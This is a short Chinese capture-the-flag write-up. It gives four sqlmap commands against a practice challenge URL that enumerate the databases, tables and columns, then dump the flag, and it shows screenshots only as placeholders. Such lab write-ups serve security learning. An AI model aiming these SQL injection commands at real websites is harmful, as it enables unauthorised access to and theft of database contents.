本系列文集:实验吧-Write up --将持续更新 觉得还不错请给个喜欢,感谢!
sqlmap跑起来:
点击了解sqlmap详细用法:sqlmap用于sql注入语法
1.查询当前数据库
sqlmap.py -u http://ctf5.shiyanbar.com/web/index_3.php?id=1 --dbs
图片.png
发现web1数据库
2.查询数据库中的表
sqlmap.py -u http://ctf5.shiyanbar.com/web/index_3.php?id=1 --tables -D web1
图片.png
发现flag表
3.查询flag表中字段名
sqlmap.py -u http://ctf5.shiyanbar.com/web/index_3.php?id=1 --columns -T flag -D web1
图片.png
发现flag字段
4.查询字段flag信息
sqlmap.py -u http://ctf5.shiyanbar.com/web/index_3.php?id=1 --dump -C flag -T flag -D web1
图片.png
网友评论